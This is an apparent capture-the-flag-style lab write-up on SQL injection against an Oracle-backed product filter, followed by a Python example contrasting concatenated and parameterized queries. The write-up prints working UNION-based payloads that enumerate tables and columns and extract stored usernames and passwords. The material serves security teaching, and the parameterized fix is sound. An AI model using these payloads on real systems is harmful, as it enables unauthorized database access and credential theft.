Lab objective: Log in as the 'administrator' user.
Lab: SQL injection attack, listing the database contents on Oracle
We know that this lab contains a SQL injection vulnerability in the product category filter.
After clicking the Gifts category we need to find the table name, the number of columns, the column names, the column types and the vulnerable column.
- We find 2 columns; the query is
  category=Gifts' ORDER BY 2-- -
- We find the columns are vulnerable and of string type; the query is
  category=-Gifts' UNION SELECT 'A','B' FROM dual--
- Now we find the table name with this query:
  category=-Gifts' UNION SELECT table_name, NULL FROM all_tables--
  The table name is USERS_PZJWZP (the table name is different every time).
- Now we find the column names, so the query will be
  category=-Gifts' UNION SELECT column_name, NULL FROM all_tab_columns WHERE table_name='USERS_PZJWZP'--
  From this we find 3 columns: EMAIL, PASSWORD_AGAINY, USERNAME_JBQHIM.
- Now we find the username and password, so the query will be
  category=-Gifts' UNION SELECT USERNAME_JBQHIM, PASSWORD_AGAINY FROM USERS_PZJWZP--
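As an added example (not part of the lab or of this writeup), the root cause and its fix side by side: the category filter built by string concatenation, which is what lets the quote in the payload change the query, next to a parameterized version that treats the same input as a plain value. SQLite stands in for Oracle here as an assumption so it runs offline; the sample products table is constructed, and the probe string is the writeup's column-count query.

```python
import sqlite3

# Constructed sample data standing in for the lab's product table.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT, category TEXT)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?)",
        [("Mug", "Gifts"), ("Pen", "Gifts"), ("Lamp", "Lifestyle")],
    )
    return conn

def filter_vulnerable(conn, category):
    # The flaw the lab relies on: the input is spliced into the SQL text, so a
    # quote in it closes the string literal and the rest is parsed as SQL.
    sql = f"SELECT name, category FROM products WHERE category = '{category}'"
    return conn.execute(sql).fetchall()

def filter_parameterized(conn, category):
    # The fix: bind the value as a parameter. The driver passes it as data,
    # so it can never alter the structure of the query.
    sql = "SELECT name, category FROM products WHERE category = ?"
    return conn.execute(sql, (category,)).fetchall()

# The writeup's column-count probe, exactly as it appears in the lab.
PROBE = "Gifts' ORDER BY 2-- -"

if __name__ == "__main__":
    db = make_db()
    # Concatenation: the probe is executed as SQL and the Gifts rows come back.
    print("vulnerable:", filter_vulnerable(db, PROBE))
    # Parameterized: the probe is just a category name that matches nothing.
    print("parameterized:", filter_parameterized(db, PROBE))
```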
